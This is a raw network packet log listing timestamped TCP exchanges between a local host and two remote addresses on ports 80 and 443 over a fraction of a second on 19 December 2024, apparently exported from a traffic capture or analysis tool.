Dec 19, 2024 10:10:39.186006069 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.186062098 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.186085939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.186204910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.187098980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.187150002 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.187218904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.187271118 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.188177109 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.188230038 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.188349009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.188399076 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.189291000 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.189347029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.189501047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.189563990 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.190613985 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.190741062 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.190818071 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.191736937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.191787958 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.191806078 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.191837072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.192873955 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.193137884 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.193180084 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.194314957 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.194370031 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.196541071 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.196624041 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.196717024 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.196737051 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.203378916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.203409910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.203449965 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.203449965 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.203921080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.203948021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.204003096 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.205014944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.205082893 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.205184937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.205238104 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.206012964 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.206078053 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.206099987 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.206161022 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.207098961 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.207159996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.207263947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.207348108 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.208453894 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.208512068 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.208592892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.208642960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.209376097 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.209440947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.209485054 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.209548950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.210526943 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.210656881 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.210663080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.210722923 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.211529016 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.211597919 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.211604118 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.211849928 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.212655067 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.212734938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.212784052 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.212846041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.213776112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.213843107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.213886023 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.213995934 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.215610981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.215668917 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.215671062 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.215725899 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.216634035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.216692924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.216787100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.216837883 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.217885017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.217971087 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.218014002 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.218061924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.218913078 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.218991041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.219033003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.219089031 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.220057011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.220115900 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.220258951 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.220339060 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.221141100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.221195936 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.221230030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.221277952 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.221929073 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.221986055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.222001076 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.222064972 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.222784996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.222841978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.222949028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.223031044 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.223764896 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.223824978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.223831892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.223865032 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.224703074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.224831104 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.224868059 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.224868059 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.225682974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.225802898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.225882053 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.225931883 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.226805925 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.226864100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.226877928 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.226950884 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.227989912 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.228105068 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.228171110 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.228229046 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.229029894 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.229080915 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.229167938 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.229221106 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.230118036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.230186939 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.230227947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.230278969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.231204033 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.231256008 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.231370926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.231424093 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.232249975 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.232311010 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.232395887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.232515097 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.233426094 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.233469963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.233484030 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.233520031 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.234539032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.234589100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.234637976 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.234688997 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.235713005 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.235774994 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.235817909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.235867977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.236824036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.236881971 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.236980915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.237041950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.237879038 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.237904072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.237958908 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.238804102 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.238867044 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.238918066 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.238970995 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.240047932 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.240097046 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.240139961 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.240191936 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.241322994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.241389036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.241393089 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.241441011 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.242168903 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.242295027 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.242369890 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.243340969 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.243367910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.243408918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.243438959 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.244373083 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.244427919 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.244501114 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.244800091 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.245392084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.245445013 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.245598078 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.245651007 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.246649981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.246706963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.246774912 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.246822119 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.247760057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.247905970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.247931957 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.247962952 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.248848915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.248908043 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.248949051 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.248996973 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.250236988 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.250305891 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.250402927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.250493050 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.251377106 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.251435041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.251486063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.251537085 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.252459049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.252513885 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.252542973 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.252595901 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.253542900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.253632069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.351388931 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.379796028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.379832029 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.379924059 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.379925013 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.380053997 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.380155087 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.380218029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.381251097 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.381371021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.381371975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.381421089 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.382441998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.382473946 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.382545948 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.382601976 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.383007050 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.383590937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.383668900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.383722067 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.384476900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.384660959 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.385499001 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.385555029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.385593891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.386461973 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.388029099 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.396303892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.396328926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.396778107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.396827936 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.396843910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.397790909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.397890091 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.397948027 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.398572922 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.398711920 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.398771048 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.399631977 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.399697065 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.399744034 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.400573015 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.400691032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.401628017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.401695967 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.401729107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.402647972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.402697086 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.402777910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.403856993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.403908014 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.403997898 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.405106068 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.405230999 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.405291080 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.406105995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.406239986 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.406289101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.407213926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.407295942 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.407501936 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.408169031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.408248901 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.408668995 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.409035921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.409116983 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.409202099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.409290075 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.410566092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.410633087 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.411576033 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.411655903 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.411672115 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.412013054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.412883043 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.413067102 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.413147926 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.413948059 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.414000034 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.414130926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.414494038 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.414975882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.415029049 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.415127993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.415739059 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.415776014 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.415817022 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.416001081 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.416125059 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.416146994 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.416168928 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.416182041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.417323112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.417391062 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.417421103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.417428970 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.417459011 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.417481899 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.417643070 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.417864084 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.418206930 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.418304920 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.418348074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.418450117 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.418512106 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.418732882 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.418817043 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.418859959 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.418876886 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.418967009 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:39.418972969 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:39.419522047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.419681072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.420041084 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.420569897 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.420692921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.421041012 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.421581984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.421639919 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.421662092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.421761036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.422602892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.422815084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.422867060 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.423810005 CET	80	49928	185.215.113.16	192.168.2.6
